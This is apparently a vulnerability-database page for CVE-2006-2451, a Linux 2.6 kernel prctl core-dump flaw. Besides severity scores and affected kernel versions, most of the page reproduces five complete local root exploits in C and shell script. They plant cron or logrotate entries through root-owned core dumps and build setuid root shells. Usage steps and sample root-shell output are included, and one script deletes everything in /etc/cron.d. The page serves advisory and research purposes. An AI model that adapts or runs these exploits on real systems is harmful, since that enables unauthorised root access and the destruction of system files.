Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-399 |
Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources. |
|
Metrics
Metric |
Score |
Severity |
CVSS Vector |
Source |
V2 |
4.6 |
|
AV:L/AC:L/Au:N/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 2031
Publication date : 2006-07-17 22:00 +00:00
Author : Marco Ivaldi
EDB Verified : Yes
/*
* $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $
*
* raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)
* Copyright (c) 2006 Marco Ivaldi
*
* The suid_dumpable support in Linux kernel 2.6.13 up to versions before
* 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial
* of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via
* the PR_SET_DUMPABLE argument of the prctl function and a program that causes
* a core dump file to be created in a directory for which the user does not
* have permissions (CVE-2006-2451).
*
* This exploit uses the logrotate attack vector: of course, you must be able
* to chdir() into the /etc/logrotate.d directory in order to exploit the
* vulnerability. I've experimented a bit with other attack vectors as well,
* with no luck: at (/var/spool/atjobs/) uses file name information to
* establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x
* permissions, xinetd (/etc/xinetd.d) puked out the crafted garbage-filled
* coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c).
*
* Thanks to Solar Designer for the interesting discussion on attack vectors.
*
* NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!!
*
* Usage:
* $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall
* [exploit must be statically linked]
* $ ./raptor_prctl2
* [please wait until logrotate is run]
* $ ls -l /tmp/pwned
* -rwsr-xr-x 1 root users 7221 2006-07-18 13:32 /tmp/pwned
* $ /tmp/pwned
* sh-3.00# id
* uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users)
* sh-3.00#
* [don't forget to delete /tmp/pwned!]
*
* Vulnerable platforms:
* Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default]
*/
#include
#include
#include
#include
#include
#include
#include
#define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)"
#define INFO2 "Copyright (c) 2006 Marco Ivaldi "
char payload[] = /* commands to be executed by privileged logrotate */
"\n/var/log/core {\n daily\n size=0\n firstaction\n chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n endscript\n}\n";
char pwnage[] = /* build setuid() helper to circumvent bash checks */
"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c";
int main(void)
{
int pid;
struct rlimit corelimit;
struct stat st;
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* prepare the setuid() helper */
system(pwnage);
/* set core size to unlimited */
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
/* let's create a fake logfile in /var/log */
if (!(pid = fork())) {
chdir("/var/log");
prctl(PR_SET_DUMPABLE, 2);
sleep(666);
exit(1);
}
kill(pid, SIGSEGV);
/* let's do the PR_SET_DUMPABLE magic */
if (!(pid = fork())) {
chdir("/etc/logrotate.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(666);
exit(1);
}
kill(pid, SIGSEGV);
/* did it work? */
sleep(3);
if ((stat("/var/log/core", &st) < 0) ||
(stat("/etc/logrotate.d/core", &st) < 0)) {
fprintf(stderr, "Error: Not vulnerable? See comments.\n");
exit(1);
}
/* total pwnage */
fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n");
exit(0);
}
// milw0rm.com [2006-07-18]
Exploit Database EDB-ID : 2004
Publication date : 2006-07-10 22:00 +00:00
Author : dreyer & RoMaNSoFt
EDB Verified : Yes
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer (main PoC code) */
/* - RoMaNSoFt (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -i");
}
// milw0rm.com [2006-07-11]
Exploit Database EDB-ID : 2005
Publication date : 2006-07-11 22:00 +00:00
Author : Julien Tinnes
EDB Verified : Yes
/* Linux >= 2.6.13 prctl kernel exploit
*
* (C) Julien TINNES
*
* If you read the Changelog from 2.6.13 you've probably seen:
* [PATCH] setuid core dump
*
* This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
* user setable argument to PR_SET_DUMPABLE.
*
* This flaw allows us to create a root owned coredump into any directory.
* This is trivially exploitable.
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define CROND "/etc/cron.d"
#define BUFSIZE 2048
struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};
char crontemplate[]=
"#/etc/cron.d/core suid_dumpable exploit\n"
"SHELL=/bin/sh\n"
"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
"#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";
char cronstring[BUFSIZE];
char fname[BUFSIZE];
struct timeval te;
void sh(int sn) {
execl(fname, fname, (char *) NULL);
}
int main(int argc, char *argv[]) {
int nw, pid;
if (geteuid() == 0) {
printf("[+] getting root shell\n");
setuid(0);
setgid(0);
if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
perror("[-] execle");
return 1;
}
}
printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n");
/* get our file name */
if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
perror("[-] readlink");
printf("This is not fatal, rewrite the exploit\n");
}
if (signal(SIGUSR1, sh) == SIG_ERR) {
perror("[-] signal");
return 1;
}
printf("[+] Installed signal handler\n");
/* Let us create core files */
setrlimit(RLIMIT_CORE, &myrlimit);
if (chdir(CROND) == -1) {
perror("[-] chdir");
return 1;
}
/* exploit the flaw */
if (prctl(PR_SET_DUMPABLE, 2) == -1) {
perror("[-] prtctl");
printf("Is you kernel version >= 2.6.13 ?\n");
return 1;
}
printf("[+] We are suidsafe dumpable!\n");
/* Forge the string for our core dump */
nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
if (nw >= sizeof(cronstring)) {
printf("[-] cronstring is too small\n");
return 1;
}
printf("[+] Malicious string forged\n");
if ((pid=fork()) == -1) {
perror("[-] fork");
return 1;
}
if (pid == 0) {
/* This is not the good way to do it ;) */
sleep(120);
exit(0);
}
/* SEGFAULT the child */
printf("[+] Segfaulting child\n");
if (kill(pid, 11) == -1) {
perror("[-] kill");
return 1;
}
if (gettimeofday(&te, NULL) == 0)
printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60));
sleep(120);
printf("[-] It looks like the exploit failed\n");
return 1;
}
// milw0rm.com [2006-07-12]
Exploit Database EDB-ID : 2006
Publication date : 2006-07-12 22:00 +00:00
Author : Marco Ivaldi
EDB Verified : Yes
/*
* $Id: raptor_prctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $
*
* raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability
* Copyright (c) 2006 Marco Ivaldi
*
* The suid_dumpable support in Linux kernel 2.6.13 up to versions before
* 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial
* of service (disk consumption) and POSSIBILY (yeah, sure;) gain privileges
* via the PR_SET_DUMPABLE argument of the prctl function and a program that
* causes a core dump file to be created in a directory for which the user does
* not have permissions (CVE-2006-2451).
*
* Berlin, Sunday July 9th 2006: CAMPIONI DEL MONDO! CAMPIONI DEL MONDO!
* CAMPIONI DEL MONDO! (i was tempted to name this exploit "pajolo.c";))
*
* Greets to Paul Starzetz and Roman Medina, who also exploited this ugly bug.
*
* NOTE. This exploit uses the Vixie's crontab /etc/cron.d attack vector: this
* means that distributions that use a different configuration (namely Dillon's
* crontab on Slackware Linux) can be vulnerable but not directly exploitable.
*
* Usage:
* $ gcc raptor_prctl.c -o raptor_prctl -Wall
* [exploit must be dinamically linked]
* $ ./raptor_prctl
* [...]
* sh-3.00#
*
* Vulnerable platforms:
* Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default]
*/
#include
#include
#include
#include
#include
#include
#include
#define INFO1 "raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability"
#define INFO2 "Copyright (c) 2006 Marco Ivaldi "
char payload[] = /* commands to be executed by privileged crond */
"\nSHELL=/bin/sh\nPATH=/usr/bin:/usr/sbin:/sbin:/bin\n* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core\n";
char pwnage[] = /* build setuid() helper to circumvent bash checks */
"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c";
int main(void)
{
int pid, i;
struct rlimit corelimit;
struct stat st;
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* prepare the setuid() helper */
system(pwnage);
/* set core size to unlimited */
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
/* let's do the PR_SET_DUMPABLE magic */
if (!(pid = fork())) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(666);
exit(1);
}
kill(pid, SIGSEGV);
/* did it work? */
sleep(3);
if (stat("/etc/cron.d/core", &st) < 0) {
fprintf(stderr, "Error: Not vulnerable? See comments.\n");
exit(1);
}
fprintf(stderr, "Ready to uncork the champagne? ");
fprintf(stderr, "Please wait a couple of minutes;)\n");
/* wait for crond to execute our evil entry */
for (i = 0; i < 124; i += 2) {
if (stat("/tmp/pwned", &st) < 0) {
fprintf(stderr, "\nError: Check /tmp/pwned!\n");
exit(1);
}
if (st.st_uid == 0)
break;
fprintf(stderr, ".");
sleep(2);
}
/* timeout reached? */
if (i > 120) {
fprintf(stderr, "\nTimeout: Check /tmp/pwned!\n");
exit(1);
}
/* total pwnage */
fprintf(stderr, "CAMPIONI DEL MONDO!\n\n");
system("/tmp/pwned");
exit(0);
}
// milw0rm.com [2006-07-13]
Exploit Database EDB-ID : 2011
Publication date : 2006-07-13 22:00 +00:00
Author : Sunay
EDB Verified : Yes
#!/bin/sh
#
# PRCTL local root exp By: Sunix
# + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp
# tested on Intel(R) Xeon(TM) CPU 3.20GHz
# kernel 2.6.9-22.ELsmp
# maybe others ...
# Tx to drayer & RoMaNSoFt for their clear code...
#
# zmia23@yahoo.com
cat > /tmp/getsuid.c << __EOF__
#include
#include
#include
#include
#include
#include
#include
#include
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
sleep(120);
}
__EOF__
cat > /tmp/s.c << __EOF__
#include
main(void)
{
setgid(0);
setuid(0);
system("/bin/sh");
system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/*");
return 0;
}
__EOF__
echo "wait aprox 4 min to get sh"
cd /tmp
cc -o s s.c
cc -o getsuid getsuid.c
./getsuid
./s
rm -rf getsuid*
rm -rf s.c
rm -rf prctl.sh
# milw0rm.com [2006-07-14]
Products Mentioned
Configuraton 0
Linux>>Linux_kernel >> Version 2.6.13
Linux>>Linux_kernel >> Version 2.6.13.1
Linux>>Linux_kernel >> Version 2.6.13.2
Linux>>Linux_kernel >> Version 2.6.13.3
Linux>>Linux_kernel >> Version 2.6.13.4
Linux>>Linux_kernel >> Version 2.6.13.5
Linux>>Linux_kernel >> Version 2.6.14
Linux>>Linux_kernel >> Version 2.6.14
Linux>>Linux_kernel >> Version 2.6.14
Linux>>Linux_kernel >> Version 2.6.14
Linux>>Linux_kernel >> Version 2.6.14
Linux>>Linux_kernel >> Version 2.6.14
Linux>>Linux_kernel >> Version 2.6.14.1
Linux>>Linux_kernel >> Version 2.6.14.2
Linux>>Linux_kernel >> Version 2.6.14.3
Linux>>Linux_kernel >> Version 2.6.14.4
Linux>>Linux_kernel >> Version 2.6.14.5
Linux>>Linux_kernel >> Version 2.6.14.6
Linux>>Linux_kernel >> Version 2.6.14.7
Linux>>Linux_kernel >> Version 2.6.15
Linux>>Linux_kernel >> Version 2.6.15
Linux>>Linux_kernel >> Version 2.6.15
Linux>>Linux_kernel >> Version 2.6.15
Linux>>Linux_kernel >> Version 2.6.15
Linux>>Linux_kernel >> Version 2.6.15
Linux>>Linux_kernel >> Version 2.6.15
Linux>>Linux_kernel >> Version 2.6.15
Linux>>Linux_kernel >> Version 2.6.15.1
Linux>>Linux_kernel >> Version 2.6.15.2
Linux>>Linux_kernel >> Version 2.6.15.3
Linux>>Linux_kernel >> Version 2.6.15.4
Linux>>Linux_kernel >> Version 2.6.15.5
Linux>>Linux_kernel >> Version 2.6.15.6
Linux>>Linux_kernel >> Version 2.6.15.7
Linux>>Linux_kernel >> Version 2.6.16
Linux>>Linux_kernel >> Version 2.6.16
Linux>>Linux_kernel >> Version 2.6.16
Linux>>Linux_kernel >> Version 2.6.16
Linux>>Linux_kernel >> Version 2.6.16
Linux>>Linux_kernel >> Version 2.6.16
Linux>>Linux_kernel >> Version 2.6.16
Linux>>Linux_kernel >> Version 2.6.16.1
Linux>>Linux_kernel >> Version 2.6.16.2
Linux>>Linux_kernel >> Version 2.6.16.3
Linux>>Linux_kernel >> Version 2.6.16.4
Linux>>Linux_kernel >> Version 2.6.16.5
Linux>>Linux_kernel >> Version 2.6.16.6
Linux>>Linux_kernel >> Version 2.6.16.7
Linux>>Linux_kernel >> Version 2.6.16.8
Linux>>Linux_kernel >> Version 2.6.16.9
Linux>>Linux_kernel >> Version 2.6.16.10
Linux>>Linux_kernel >> Version 2.6.16.11
Linux>>Linux_kernel >> Version 2.6.16.12
Linux>>Linux_kernel >> Version 2.6.16.13
Linux>>Linux_kernel >> Version 2.6.16.14
Linux>>Linux_kernel >> Version 2.6.16.15
Linux>>Linux_kernel >> Version 2.6.16.16
Linux>>Linux_kernel >> Version 2.6.16.17
Linux>>Linux_kernel >> Version 2.6.16.18
Linux>>Linux_kernel >> Version 2.6.16.19
Linux>>Linux_kernel >> Version 2.6.16.20
Linux>>Linux_kernel >> Version 2.6.16.21
Linux>>Linux_kernel >> Version 2.6.16.22
Linux>>Linux_kernel >> Version 2.6.16.23
Linux>>Linux_kernel >> Version 2.6.17
Linux>>Linux_kernel >> Version 2.6.17
Linux>>Linux_kernel >> Version 2.6.17
Linux>>Linux_kernel >> Version 2.6.17
Linux>>Linux_kernel >> Version 2.6.17
Linux>>Linux_kernel >> Version 2.6.17
Linux>>Linux_kernel >> Version 2.6.17
Linux>>Linux_kernel >> Version 2.6.17.1
Linux>>Linux_kernel >> Version 2.6.17.2
Linux>>Linux_kernel >> Version 2.6.17.3
References